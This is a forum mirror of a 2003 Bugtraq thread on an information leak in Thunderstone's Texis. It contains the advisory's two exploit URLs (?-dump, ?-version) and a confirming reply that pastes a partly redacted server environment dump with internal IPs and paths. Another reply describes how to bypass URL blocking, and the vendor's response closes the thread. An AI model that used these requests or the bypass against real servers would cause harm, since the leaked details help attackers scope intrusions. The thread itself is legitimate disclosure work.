Likes Likes:  0
Resultaten 1 tot 4 van de 4
Geen
  1. #1
    sir.mordred@hushmail.com
    @(#)Mordred Labs advisory - Texis sensitive information leak
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    @(#)Mordred Labs advisory - Texis sensitive information leak


    -----BEGIN PGP SIGNED MESSAGE-----

    //@(#) Mordred Security Labs advisory

    Release date: March 15, 2003
    Name: Texis sensitive information leak
    Versions affected: all versions
    Risk: average
    Author: Sir Mordred (mordred@s-mail.com, http://mslabs.iwebland.com)

    I. Description:

    Thunderstone is an independent R&D company that has been providing
    high-performance state-of-the-art solutions to intelligent information retrieval and management problems for over 21 years.
    Their product, Texis, provides every full-text, SQL, multimedia management,
    and dynamic publishing operation needed for an enterprise search application.
    For more info please visit http://www.thunderstone.com/texis/site/pages

    II. Details:

    The texis program executes files written in Texis Web Script (aka Vortex),
    a powerful web-server-side HTML programming language. It can be invoked
    from the command line, or as a CGI program from the web server to run scripts.
    By requesting a specially crafted urls, a very sensitive information about the system will be displayed.

    III. Exploit:

    http://victim.com/texis.exe/?-version
    http://victim.com/texis.exe/?-dump

    IV. Vendor

    Vendor contacted, no reply since.

    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.2 (Java)
    Note: This signature can be verified at https://www.hushtools.com/verify

    wmAEARECACAFAj5yWYgZHHNpci5tb3JkcmVkQGh1c2htYWlsLm NvbQAKCRAOkXvN4BZr
    fD4UAKCVeAeOZhA1eVLg2xvas9R9rih8GQCgm0VbeqP8gCHKLV na1oTb0YFXKok=
    =9+oU
    -----END PGP SIGNATURE-----




    Concerned about your privacy? Follow this link to get
    FREE encrypted email: https://www.hushmail.com/?l=2

    Big $$$ to be made with the HushMail Affiliate Program:
    https://www.hushmail.com/about.php?s...ffiliate&l=427

  2. #2
    Kurt Seifried
    @(#)Mordred Labs advisory - Texis sensitive information leak
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: @(#)Mordred Labs advisory - Texis sensitive information leak

    Confirmed. Time to configure your web application proxies to block the
    naughty strings. Doing a google search for texis.exe turns up some
    interesting sites, all of which respond to ?-dump and ?-version. The
    information provided is significant including local ip and forwarding IP (so
    you can determine load balancing/etc setups quite easily):

    ==========================
    Environment
    ALLUSERSPROFILE='C:\Documents and Settings\All Users'
    CommonProgramFiles='C:\Program Files\Common Files'
    COMPUTERNAME='SDTIWEB'
    ComSpec='C:\WINNT\system32\cmd.exe'
    CONTENT_LENGTH='0'
    GATEWAY_INTERFACE='CGI/1.1'
    HTTPS='off'
    HTTP_ACCEPT='image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
    application/vnd.ms-excel, application/msword, application/x-shockwave-flash,
    */*'
    HTTP_ACCEPT_LANGUAGE='en-us'
    HTTP_CONNECTION='keep-alive'
    HTTP_HOST='www.[VICTIM_NAME_REMOVED].com'
    HTTP_USER_AGENT='Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)'
    HTTP_VIA='1.1 [WEB_PROXY_REMOVED]:3128 (Squid/2.4.STABLE7)'
    HTTP_ACCEPT_ENCODING='gzip, deflate'
    HTTP_X_FORWARDED_FOR='10.2.0.20'
    HTTP_CACHE_CONTROL='max-age=259200'
    INSTANCE_ID='1'
    LOCAL_ADDR='192.168.12.22'
    NUMBER_OF_PROCESSORS='2'
    Os2LibPath='C:\WINNT\system32\os2\dll;'
    OS='Windows_NT'
    Path='C:\WINNT\system32;C:\WINNT;C:\WINNT\System32 \Wbem'
    PATHEXT='.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.W SF;.WSH'
    PATH_TRANSLATED='N:\[VICTIM_NAME_REMOVED]\Inetpub\betaroot'
    PROCESSOR_ARCHITECTURE='x86'
    PROCESSOR_IDENTIFIER='x86 Family 6 Model 11 Stepping 1, GenuineIntel'
    PROCESSOR_LEVEL='6'
    PROCESSOR_REVISION='0b01'
    ProgramFiles='C:\Program Files'
    QUERY_STRING='-dump'
    REMOTE_ADDR='24.86.189.174'
    REMOTE_HOST='24.86.189.174'
    REQUEST_METHOD='GET'
    SCRIPT_NAME='/programs/texis.exe'
    SERVER_NAME='www.[VICTIM_NAME_REMOVED].com'
    SERVER_PORT='80'
    SERVER_PORT_SECURE='0'
    SERVER_PROTOCOL='HTTP/1.0'
    SERVER_SOFTWARE='Microsoft-IIS/5.0'
    SystemDrive='C:'
    SystemRoot='C:\WINNT'
    TEMP='C:\WINNT\TEMP'
    TMP='C:\WINNT\TEMP'
    USERPROFILE='C:\Documents and Settings\Default User'
    windir='C:\WINNT'

    Command line
    N:\[VICTIM_NAME_REMOVED]\Inetpub\Webinator4\texis.exe -dump
    Miscellaneous
    32-bit files

    Variables
    $urlroot='/programs/texis.exeN:\rsasfiles\Inetpub\betaroot'
    $pathroot='N:\[VICTIM_NAME_REMOVED]\Inetpub\betaroot'
    $sourcepath='N:\[VICTIM_NAME_REMOVED]\Inetpub\betaroot'

    ==========================

    Kurt Seifried, kurt@seifried.org
    A15B BEE5 B391 B9AD B0EF
    AEB0 AD63 0B4E AD56 E574
    http://seifried.org/security/


  3. #3
    Kurt Seifried
    @(#)Mordred Labs advisory - Texis sensitive information leak
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: @(#)Mordred Labs advisory - Texis sensitive information leak

    > //@(#) Mordred Security Labs advisory
    >
    > Release date: March 15, 2003
    > Name: Texis sensitive information leak
    > Versions affected: all versions
    > Risk: average
    > Author: Sir Mordred (mordred@s-mail.com, http://mslabs.iwebland.com)


    > III. Exploit:
    >
    > http://victim.com/texis.exe/?-version
    > http://victim.com/texis.exe/?-dump


    Please note that simply blocking URL's ending in "?-dump" and "?-version"
    won't work. You can append a space and additional text, such as:

    http://www.example.org/cgi-bin/texis...hkjhskjsh.html

    I didn't bother to test any other special characters or encoding (i.e.
    UNICODE), I suspect there may be other ones that can be used.

    Kurt Seifried, kurt@seifried.org
    A15B BEE5 B391 B9AD B0EF
    AEB0 AD63 0B4E AD56 E574
    http://seifried.org/security/


  4. #4
    @(#)Mordred Labs advisory - Texis sensitive information leak
    Gast
    n/a Berichten
    Berichten zijn liked



    Thread Starter

    Re: @(#)Mordred Labs advisory - Texis sensitive information leak

    In-Reply-To: <200303142239.h2EMdbbK049019@mailserver3.hushmail. com>

    THUNDERSTONE RESPONSE TO SECURITY ALERT

    Thunderstone Software is aware of a report about a "vulnerability" in one of our products, published on Bugtraq. Thunderstone takes such concerns seriously. We offer the following details for concerned customers and users of our software.

    Texis issues a message that reveals a web server's "path to document root" and other information, when given one of the special query strings "-dump" or "-version". The message is intended to aide in solving set-up or configuration problems.

    A risk is present only if there is some additional vulnerability on that same server. The reported issue does not provide access to the server, although it may be used by an attacker to narrow the attack against other vulnerabilities.

    Although we consider the vulnerability minor, we have initiated a modification to resolve the issue. Customers who wish to take advantage of the change should contact Thunderstone tech support.

    Some customers may prefer the current functionality, which is not inadvertent or a "bug." Rather, Thunderstone designed its software to include this information for resolving web server path problems, which are common.

    Customers that have applied a patch to fix an earlier similar vulnerability related to invalid script paths are not vulnerable.

    Customers using vhttpd can use an EntryScript to check for the suspect query strings, and take an appropriate action if they are detected.

    For additional information, please contact Thunderstone Software, http://www.thunderstone.com

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics